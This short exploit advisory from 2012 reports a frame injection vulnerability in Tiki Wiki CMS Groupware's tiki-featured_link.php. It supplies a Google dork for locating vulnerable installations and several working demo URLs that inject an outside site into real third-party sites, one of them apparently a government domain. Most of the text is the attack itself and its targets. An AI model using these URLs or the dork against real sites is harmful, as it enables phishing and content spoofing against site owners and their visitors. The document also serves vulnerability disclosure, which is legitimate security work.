# Exploit Title: Tiki Wiki CMS Groupware Frame Injection
# Date: 17.02.2012
# Author: Sony
# Software Link: http://info.tiki.org/tiki-index.php
# Google Dorks: inurl:tiki-featured_link.php?type=
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html
..................................................................

We have Frame Injection in the Tiki Wiki CMS Groupware.

Demo:

http://stats.tiki.org/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com

http://2.bp.blogspot.com/-em2guD5zVl4/Tz6R6Rp4eGI/AAAAAAAAAg4/PjyEb1BAEyY/s1600/tiki.JPG

http://wiki.lxcenter.org/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com

http://www.maps.gov.ck/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com

etc..